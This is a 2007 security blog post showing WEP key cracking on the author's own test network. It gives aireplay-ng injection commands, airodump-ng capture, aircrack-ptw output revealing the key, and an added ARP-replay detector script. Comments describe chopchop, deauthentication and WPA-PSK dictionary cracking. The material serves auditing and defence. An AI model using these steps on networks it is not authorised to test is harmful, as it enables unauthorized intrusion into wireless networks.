What else do you need not to use WEP anymore?
Tonight (Yeah, I know, I should get more sleep!), while I was working on a wireless project you will hear about soon, I read the announcement of a paper titled "Breaking 104 bit WEP in less than 60 seconds". I couldn't wait to digest and test it, so impatiently, I prepared my wireless gear with the following setup:
- A 104-bit WEP-based 802.11g wireless network, using a Linksys WRT54GL access point running OpenWrt.
- A client laptop running Windows XP SP2 (with the Windows Wireless Update patch; come on, install it! ;)), using an Atheros wireless card.
- An auditor laptop running BackTrack 2 Final and using an Atheros wireless card too.
I downloaded the tool, aircrack-ptw, that implements the paper's improvements to derive the RC4 key used by WEP with as few as 40,000 frames (theoretically, around 60 seconds). I uncompressed and compiled the tool with a simple "make". However, before running "make" on BackTrack, be sure to edit the Makefile and move the "-lpcap" switch to the end of the gcc line for the "aircrack-ptw" target.
The Atheros cards use the madwifi-ng driver by default, so you need to follow step-by-step the pretty recent aircrack-ng WEP cracking tutorial (it contains all the specific details you need to test this). The tool needs the full frames (PCAP files) to work, so you need to omit "--ivs" in Step 3, and instead of using the standard aircrack-ng, you must use the new aircrack-ptw tool (Step 5).
Let's see a summary of my setup and the results I got (...in less than 60 seconds?):
- Step 1 - Put the card in monitor mode.
- Step 2 - Create a fake authentication from the auditor laptop:
# aireplay-ng -1 0 -e TheMatrix -a 00:18:39:86:F2:55 -h 00:13:46:73:F2:99 ath0
02:25:28 Sending Authentication Request
02:25:28 Authentication successful
02:25:28 Sending Association Request
02:25:28 Association successful :-)
- Step 3 - Run airodump to collect the traffic:
# airodump-ng -c 6 --bssid 00:18:39:86:F2:55 -w output ath0
CH 6 ][ Elapsed: 1 min ][ 2007-04-05 02:29
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:86:F2:55 54 100 812 49547 585 6 48. WEP WEP TheMatrix
BSSID STATION PWR Lost Packets Probes
00:18:39:86:F2:55 00:13:46:73:F2:99 63 0 26891
00:18:39:86:F2:55 00:13:46:98:03:BB 64 0 25522
- Step 4 - Capture and inject traffic in the form of ARP packets:
# aireplay-ng -3 -b 00:18:39:86:F2:55 -h 00-13-46-73-F2-99 ath0
Saving ARP requests in replay_arp-0405-022535.cap
You should also start airodump-ng to capture replies.
...
- Step 5 - Using my setup, injecting 40,000 valid frames took between 65 and 75 seconds. My first try revealed the key with nearly 46,000 frames:
# ./aircrack-ptw ../output-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:18:39:86:F2:55 keyindex=0
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=45937
Found key with len 13: CA FE CA FE CA FE CA FE CA FE CA FE CA
The result was not bad, but the paper/tool promise was much better. My second try only needed 42,000 frames, but this still meant more than 60 seconds:
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=42648
Third time's the charm: 38,653 frames and 59 seconds! ;)
stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=38653
Awesome results and advancements for auditing the security of WEP-based wireless networks!
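From the defender's side, the Step 4 traffic is very recognisable: one station pushes hundreds of identically sized WEP data frames per second (the airodump output above shows 585/s). As an added example that is not part of this post or of the aircrack-ng suite, here is a small detector over a constructed capture; the station MACs are the ones from the post's airodump listing, and the rate and size-ratio thresholds are assumptions you would tune for your own network.

```python
"""Flag ARP-replay style injection: a fast burst of same-length data frames
from a single station. Constructed example; frames are (timestamp, src_mac,
frame_type, length) tuples such as a monitor-mode sniffer would emit."""
from collections import defaultdict

# Assumed thresholds: aireplay-ng -3 replays one fixed-size ARP request at
# hundreds of frames per second, far above any normal client.
RATE_THRESHOLD = 100      # data frames per second from one station
SAME_SIZE_RATIO = 0.9     # fraction of the burst sharing one frame length
WINDOW = 1.0              # sliding window in seconds


def detect_arp_replay(frames, rate=RATE_THRESHOLD, ratio=SAME_SIZE_RATIO,
                      window=WINDOW):
    """Return {src_mac: peak_frames_per_second} for stations whose data
    frames are both fast and monotonous (one length dominates the window)."""
    by_src = defaultdict(list)
    for ts, src, ftype, length in frames:
        if ftype == "data":
            by_src[src].append((ts, length))
    alerts = {}
    for src, items in by_src.items():
        items.sort()                     # order by timestamp
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1               # slide the window forward
            count = end - start + 1
            if count < rate * window:
                continue
            lengths = [length for _, length in items[start:end + 1]]
            dominant = max(lengths.count(x) for x in set(lengths))
            if dominant / count >= ratio:
                alerts[src] = max(alerts.get(src, 0.0), count / window)
    return alerts


def constructed_capture():
    """Synthetic capture: a normal client sending varied-size frames at
    20/s, plus the auditor station replaying a 68-byte ARP request 300/s."""
    frames = []
    for i in range(30):
        frames.append((i * 0.05, "00:13:46:98:03:BB", "data", 100 + (i * 37) % 900))
    for i in range(300):
        frames.append((0.5 + i / 300.0, "00:13:46:73:F2:99", "data", 68))
    return frames


if __name__ == "__main__":
    for mac, pps in detect_arp_replay(constructed_capture()).items():
        print(f"possible WEP ARP replay from {mac}: {pps:.0f} frames/s")
```

The same heuristic also catches the chaff problem discussed in the comments below only partially: cloaking frames are meant to look like real traffic, so a real WIDS would add the sequence-number and signal-level checks mentioned there.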
<plug> You can learn about this and other advanced wireless security techniques in the upcoming SANS Assessing and Securing Wireless Networks course in Brussels, June 25-30, 2007. </plug>
What else do you need to switch to WPA/WPA2? Vendors have no excuse not to implement WPA in every wireless device in 2007!!
UPDATE: This was "Breaking 104-bit WEP in less than 60 seconds". Check the next blog entry for breaking 40-bit WEP in less than...
Labels: Wireless
4 Comments:
Authentication and association (step 2) works fine in open-WEP mode. It doesn't work in shared-WEP mode ;)... In this case I performed the Korek chopchop attack with aireplay-ng -4 -h mac_address ath0, recovered the RC4 keystream, and generated a forged ARP request with arpforge-ng ;). WEP is unbreakable with AirDefense WEP cloaking technology http://www.tmcnet.com/usubmit/2007/04/02/2457867.htm. WPA-PSK (TKIP) and WPA2-PSK (AES) are also breakable... ;) With aireplay-ng -0 10 bla, bla I performed deauthentication and disassociation, captured the WPA challenge/response authentication packets with airodump, and finally cracked the challenge/response with cowpatty or aircrack-ng -a 2.... genpmk drastically helps to precompute PMKs to crack WPA (with cowpatty).
Hi anon,
Thanks for your comment!
It is true that the example only works for open-auth WEP-based networks. If the WEP network uses shared authentication, then you need to obtain PRGA in order to encrypt the challenge sent by the AP. There are multiple ways of getting PRGA, one is the Korek chopchop attack you mention, but you can also use a WEP-based fragmentation attack or the simplest method, wait for (or force) a valid client to connect to the network: airodump-ng will collect the PRGA required for you ;)
If you are interested in the details, check the aircrack-ng tutorial called "How to do shared key fake authentication ?".
Re the recently announced AirDefense WEP Cloaking feature, I strongly suggest everybody read the following article by my good friend Joshua Wright, "AirDefense Perpetuates Flawed Protocols". You cannot secure WEP!! There are so many flaws in it that the smarter option for real security is to switch to WPA/WPA2. I know there are environments where this change would be too costly, but then, accept that a dedicated attacker will be able to break in.
Finally, re WPA/WPA2-PSK cracking, the current attack methods are based on dictionary attacks, trying to guess the pre-shared key if it is based on a dictionary word or is guessable. This is why the 802.11i specification recommends passphrases of 20 chars or more, and I suggest using 64-char random passphrases, such as the ones generated by GRC's password generator. If you don't trust Steve Gibson, mix the characters obtained from multiple invocations ;)
Good article by Joshua, but I think he is agreeing that WEP cloaking works in at least one case. Or, is it really possible to decipher in spite of WEP cloaking?
The real situation nowadays is that we are all waiting to have access to a packet capture of the WEP Cloaking countermeasures, because it seems relatively easy to discern between the real WEP packets and the ones generated by the protection system (sequence numbers, signal levels...).
It seems that even AirDefense comments on the SF WiFiSec list a few months ago ratified that, because they clarified WEP Cloaking is an extra layer of security for its WiFi defense in-depth architecture.